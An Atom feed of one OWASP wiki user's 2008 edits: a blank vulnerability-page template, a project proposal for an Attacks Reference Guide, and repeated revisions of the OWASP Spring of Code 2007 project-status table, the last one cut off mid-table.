<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
		<id>https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Nsrav</id>
		<title>OWASP - User contributions [en]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki.owasp.org/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Nsrav"/>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php/Special:Contributions/Nsrav"/>
		<updated>2026-04-17T17:28:45Z</updated>
		<subtitle>User contributions</subtitle>
		<generator>MediaWiki 1.27.2</generator>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Vulnerability_template&amp;diff=24798</id>
		<title>Vulnerability template</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Vulnerability_template&amp;diff=24798"/>
				<updated>2008-01-28T20:33:40Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: New page: ==Description==  PS: in case of a &amp;quot;Exposure Period&amp;quot; section exists, it should be placed on this section as a subsection. Ex:&amp;lt;nowiki&amp;gt;===Exposure Period===&amp;lt;/nowiki&amp;gt;   ==Examples ==  ===Examp...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Description==&lt;br /&gt;
&lt;br /&gt;
PS: in case of a &amp;quot;Exposure Period&amp;quot; section exists, it should be placed on this section as a subsection.&lt;br /&gt;
Ex:&amp;lt;nowiki&amp;gt;===Exposure Period===&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Example n===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Likelihood of exploitation ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Technical Impacts==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Vulnerabilities==&lt;br /&gt;
PS: &amp;quot;Related Problems&amp;quot; sections should be placed on this section&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Attacks==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Threats Agents==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related Countermeasures==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;[[Category:XYZ]]&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;[[Category:XPTO]]&amp;lt;/nowiki&amp;gt;&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide&amp;diff=24784</id>
		<title>SpoC 007 - Attacks Reference Guide</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=SpoC_007_-_Attacks_Reference_Guide&amp;diff=24784"/>
				<updated>2008-01-28T18:33:39Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''AoC Candidate''':  NSRAV Security R&amp;amp;D&lt;br /&gt;
&lt;br /&gt;
'''Project coordinator''': Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
'''Project Progress''': 100% Complete, [[SpoC 007 - Attacks Reference Guide - Progress Page|Progress Page]]&lt;br /&gt;
&lt;br /&gt;
==  Leonardo Cavallari &amp;amp; Matteo Nava - NSRAV Security R&amp;amp;D - Attacks Reference Guide ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===  Introduction ===&lt;br /&gt;
&lt;br /&gt;
Leonardo Cavallari &amp;amp; Matteo Nava are security specialists of [http://www.evaltec.com.br E-VAL Technologies] and coordinators of [http://nsrav.lsi.usp.br/ NSRAV], a security research center located at [http://www2.usp.br/portugues/index.usp University of Sao Paulo] Brazil, with more than 10 years on the information security field. The team is formed by PhDs, MSc, graduate and post-graduate students and security specialists with GIAC/SANS and CISSP certifications.&lt;br /&gt;
&lt;br /&gt;
The team develops research and consulting activities in almost every field of information security, focused on EHT, Web applications, IDS/IPS and detection techniques, grid security, among others.&lt;br /&gt;
&lt;br /&gt;
=== Our Expectations ===&lt;br /&gt;
&lt;br /&gt;
We recently started contributing to OWASP and we are developing a Portuguese translated version of Testing guide v2 in order to spread it out to the ones who has potential language barrier.&lt;br /&gt;
&lt;br /&gt;
The maintenance of attacks and vulnerability information is very close to our activities. We believe that we have the specific knowledge and expertise to develop this project. &lt;br /&gt;
&lt;br /&gt;
=== Executive Summary ===&lt;br /&gt;
&lt;br /&gt;
We are proposing that we will research about new types of attacks and techniques that aim to Web application/server and report all details about each one. We are intended to explain in details each attack, classify by severity, likelihood of exploitation and impact (when possible), cite references and means of circumvent.&lt;br /&gt;
&lt;br /&gt;
The present OWASP Attacks reference guide lists a great quantity of attacks, but lots of them are lacking explanation and references. For instances, [http://www.owasp.org/index.php/SQL_Injection SQL Injection] is completely referenced, while [http://www.owasp.org/index.php/Format_string_attack Format string] has only the topics but no description at all.&lt;br /&gt;
&lt;br /&gt;
Also, we plan to categorize the attacks according to testing guide categories, in order to give a better view of the attacks related to certain test category.&lt;br /&gt;
&lt;br /&gt;
We believe that the Attack reference guide is very important to OWASP since it describes theoretical and practical all the threats a Web application can be susceptible, it gives the reason for OWASP existence.&lt;br /&gt;
&lt;br /&gt;
The vulnerability reference guide is important as well and we will be constantly contributing to maintain it up to date, since it misses lots of information and references on the items. Also, it has almost 600 vulnerabilities and we are quite sure that there are some redundant or even out-of-date items. &lt;br /&gt;
&lt;br /&gt;
===  Specific activities ===&lt;br /&gt;
&lt;br /&gt;
As long we will be participating as a group, the activities will be divided as following steps:&lt;br /&gt;
&lt;br /&gt;
* Identify all existent attacks at OWASP site.&lt;br /&gt;
* Research new attacks and techniques&lt;br /&gt;
* Create test scenarios and exploitation, in order to acquire evidences to be published (when needed)&lt;br /&gt;
* Detail and reference each attacks, with most known and reliable sources.  &lt;br /&gt;
&lt;br /&gt;
=== Long-Term Vision for the Project ===&lt;br /&gt;
&lt;br /&gt;
We expect that with a worldwide contribution, the Attack and Honeycomb project can become the most complete and updated security reference available. Also, we expect to create cross-reference among OWASP documents, using the same concepts, definitions, and categories in order to inter-link all the documents.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''[http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Selection Back to SpoC 007 Selection page]'''&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&amp;diff=24778</id>
		<title>OWASP Spring Of Code 2007 - Projects</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&amp;diff=24778"/>
				<updated>2008-01-28T18:19:44Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== All SpoC Projects ==&lt;br /&gt;
&lt;br /&gt;
This page contains the latest information about the status of the [[OWASP Spring Of Code 2007]] projects (and links to each project's SpoC page)&lt;br /&gt;
&lt;br /&gt;
'''FINISHED PROJECTS'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - SqlMap|SqlMap]]&lt;br /&gt;
| Bernardo Damele&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]&lt;br /&gt;
| Leonardo Cavallari and Matteo Nava&lt;br /&gt;
NSRAV Security Research Group&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]&lt;br /&gt;
| Eric Sheridan and &lt;br /&gt;
Dr. Goran Trajkovski&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Code review Project|Code review Project]]&lt;br /&gt;
| Eoin Keary&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]&lt;br /&gt;
| Sebastien Deleersnyder&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]&lt;br /&gt;
| Erwin Geirnaert&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]&lt;br /&gt;
| Zalivin Denis&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]&lt;br /&gt;
| Przemyslaw 'rezos' Skowron&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]&lt;br /&gt;
| Heiko Webers&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]&lt;br /&gt;
| Arturo (Buanzo) Busleiman&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]&lt;br /&gt;
| Erwin Geirnaert&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]&lt;br /&gt;
| Andy Gocke&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]&lt;br /&gt;
| Paulo Coimbra&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]&lt;br /&gt;
| Arshan Dabirsiaghi&lt;br /&gt;
| Yes&lt;br /&gt;
|'''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]&lt;br /&gt;
| Ed Finkler&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''100%''' &lt;br /&gt;
 '''Waiting for final review'''&lt;br /&gt;
| Andrew v d Stock &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]&lt;br /&gt;
| Paolo Perego&lt;br /&gt;
| Yes&lt;br /&gt;
| Half term review: '''done'''&lt;br /&gt;
Not reviewed progress: '''100%''' &lt;br /&gt;
 '''Waiting for final review'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]&lt;br /&gt;
| Joshua Perrymon&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''100%''' &lt;br /&gt;
 '''Waiting for final review'''&lt;br /&gt;
| Eoin Keary/&lt;br /&gt;
Dinis Cruz&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''AGREED EXTENSION PROJECTS'''  &lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]&lt;br /&gt;
| Boris Maletic and&lt;br /&gt;
Mike de Libero&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''20%&lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]''' &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Corporate Application Security Rating Guide|OWASP Corporate Application Security Rating Guide]]&lt;br /&gt;
| Erwin Geirnaert &lt;br /&gt;
| Yes&lt;br /&gt;
| 20% &lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''&lt;br /&gt;
| Mandeep Khera &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]&lt;br /&gt;
| Mark Curphey&lt;br /&gt;
| Yes&lt;br /&gt;
| Half term review: '''done'''&lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''&lt;br /&gt;
| OWASP Board&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]&lt;br /&gt;
| Subere&lt;br /&gt;
| Yes&lt;br /&gt;
| Half term review: '''done'''&lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''CLOSED PROJECTS  - Partially completed'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]&lt;br /&gt;
| Bunyamin Demir&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''40%'''&lt;br /&gt;
'''Project Closed'''/Partially completed&lt;br /&gt;
| Ivan Ristic &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]&lt;br /&gt;
| Josh Sweeney&lt;br /&gt;
| Yes&lt;br /&gt;
| Reviewed progress: '''30%'''&lt;br /&gt;
'''Project Closed'''/Partially completed&lt;br /&gt;
| Eoin Keary&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''CANCELLED PROJECTS'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]&lt;br /&gt;
| Matteo Meucci&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]&lt;br /&gt;
| Keith Casey&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0%&lt;br /&gt;
'''Project Cancelled''' &lt;br /&gt;
|&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Best Practices &amp;amp; Countermeasures|Best Practices &amp;amp; Countermeasures]]&lt;br /&gt;
| Jim&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled''' &lt;br /&gt;
| &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Brand|OWASP brand]]&lt;br /&gt;
| Paulo Coimbra&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled''' &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - WebScarab NG Security Test Automation|WebScarab NG Security Test Automation]]&lt;br /&gt;
| Darren Edmonds&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Nsrav</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&amp;diff=24777</id>
		<title>OWASP Spring Of Code 2007 - Projects</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Spring_Of_Code_2007_-_Projects&amp;diff=24777"/>
				<updated>2008-01-28T18:19:16Z</updated>
		
		<summary type="html">&lt;p&gt;Nsrav: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== All SpoC Projects ==&lt;br /&gt;
&lt;br /&gt;
This page contains the latest information about the status of the [[OWASP Spring Of Code 2007]] projects (and links to each project's SpoC page)&lt;br /&gt;
&lt;br /&gt;
'''FINISHED PROJECTS'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - SqlMap|SqlMap]]&lt;br /&gt;
| Bernardo Damele&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Attacks Reference Guide|Attacks Reference Guide]]&lt;br /&gt;
| Leonardo Cavallari and Matteo Nava - NSRAV Security Research Group&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - The Scholastic Application Security Assessment Project|The Scholastic Application Security Assessment Project]]&lt;br /&gt;
| Eric Sheridan and &lt;br /&gt;
Dr. Goran Trajkovski&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Code review Project|Code review Project]]&lt;br /&gt;
| Eoin Keary&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Education Project|OWASP Education Project]]&lt;br /&gt;
| Sebastien Deleersnyder&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP WebGoat Solutions Guide|OWASP WebGoat Solutions Guide]]&lt;br /&gt;
| Erwin Geirnaert&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Python Tainted Mode|Python Tainted Mode]]&lt;br /&gt;
| Zalivin Denis&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Refresh Attacks list|Refresh Attacks list]]&lt;br /&gt;
| Przemyslaw 'rezos' Skowron&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Web Application Security put into practice|Web Application Security put into practice]]&lt;br /&gt;
| Heiko Webers&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Enigform: Firefox Addon for OpenPGP signing of HTTP requests|Enigform: Firefox Addon for OpenPGP signing of HTTP requests]]&lt;br /&gt;
| Arturo (Buanzo) Busleiman&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Java Project|OWASP Java Project]]&lt;br /&gt;
| Erwin Geirnaert&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Interim @ Aspect Offices|Interim @ Aspect Offices]]&lt;br /&gt;
| Andy Gocke&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Help with SpoC project management|Help with SpoC project management]]&lt;br /&gt;
| Paulo Coimbra&lt;br /&gt;
| Yes&lt;br /&gt;
| '''Project Finished'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP The Anti-Samy Project|OWASP The Anti-Samy Project]]&lt;br /&gt;
| Arshan Dabirsiaghi&lt;br /&gt;
| Yes&lt;br /&gt;
|'''Project Finished'''&lt;br /&gt;
| Jeff Williams&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Inspekt|Inspekt: Input filtering and validation library for PHP]]&lt;br /&gt;
| Ed Finkler&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''100%''' &lt;br /&gt;
 '''Waiting for final review'''&lt;br /&gt;
| Andrew v d Stock &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Owasp Orizon Project|Owasp Orizon Project]]&lt;br /&gt;
| Paolo Perego&lt;br /&gt;
| Yes&lt;br /&gt;
| Half term review: '''done'''&lt;br /&gt;
Not reviewed progress: '''100%''' &lt;br /&gt;
 '''Waiting for final review'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP LiveCD Project|OWASP LiveCD Project]]&lt;br /&gt;
| Joshua Perrymon&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''100%''' &lt;br /&gt;
 '''Waiting for final review'''&lt;br /&gt;
| Eoin Keary/&lt;br /&gt;
Dinis Cruz&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''AGREED EXTENSION PROJECTS'''  &lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Site Generator|OWASP Site Generator]]&lt;br /&gt;
| Boris Maletic and&lt;br /&gt;
Mike de Libero&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''20%&lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]''' &lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Corporate Application Security Rating Guide|OWASP Corporate Application Security Rating Guide]]&lt;br /&gt;
| Erwin Geirnaert &lt;br /&gt;
| Yes&lt;br /&gt;
| 20% &lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''&lt;br /&gt;
| Mandeep Khera &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - The OWASP Web Security Certification Framework|The OWASP Web Security Certification Framework]]&lt;br /&gt;
| Mark Curphey&lt;br /&gt;
| Yes&lt;br /&gt;
| Half term review: '''done'''&lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''&lt;br /&gt;
| OWASP Board&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP JBroFuzz Project|OWASP JBroFuzz Project]]&lt;br /&gt;
| Subere&lt;br /&gt;
| Yes&lt;br /&gt;
| Half term review: '''done'''&lt;br /&gt;
'''[https://www.owasp.org/index.php/Sponsored_Projects Transferred to Sponsored Projects]'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''CLOSED PROJECTS  - Partially completed'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP WeBekci Project|OWASP WeBekci Project]]&lt;br /&gt;
| Bunyamin Demir&lt;br /&gt;
| Yes&lt;br /&gt;
| Not reviewed progress: '''40%'''&lt;br /&gt;
'''Project Closed'''/Partially completed&lt;br /&gt;
| Ivan Ristic &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP LiveCD Education Project|OWASP LiveCD Education Project]]&lt;br /&gt;
| Josh Sweeney&lt;br /&gt;
| Yes&lt;br /&gt;
| Reviewed progress: '''30%'''&lt;br /&gt;
'''Project Closed'''/Partially completed&lt;br /&gt;
| Eoin Keary&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
'''CANCELLED PROJECTS'''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; WIDTH=100%&lt;br /&gt;
|-&lt;br /&gt;
! SpoC Project Name&lt;br /&gt;
! Author&lt;br /&gt;
! Confirmed&lt;br /&gt;
! Status&lt;br /&gt;
! Coordinated by &lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Certification Project|OWASP Certification Project]]&lt;br /&gt;
| Matteo Meucci&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled'''&lt;br /&gt;
| Dinis Cruz&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Security throughout the SDLC|Security throughout the SDLC]]&lt;br /&gt;
| Keith Casey&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0%&lt;br /&gt;
'''Project Cancelled''' &lt;br /&gt;
|&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - Best Practices &amp;amp; Countermeasures|Best Practices &amp;amp; Countermeasures]]&lt;br /&gt;
| Jim&lt;br /&gt;
| No&lt;br /&gt;
| Not reviewed progress: 0% &lt;br /&gt;
'''Project Cancelled''' &lt;br /&gt;
| &lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
! [[SpoC 007 - OWASP Brand|OWASP brand]]&lt;br /&gt;
| Paulo Coimbra&lt;br /&gt;
| No&lt;br /&gt;
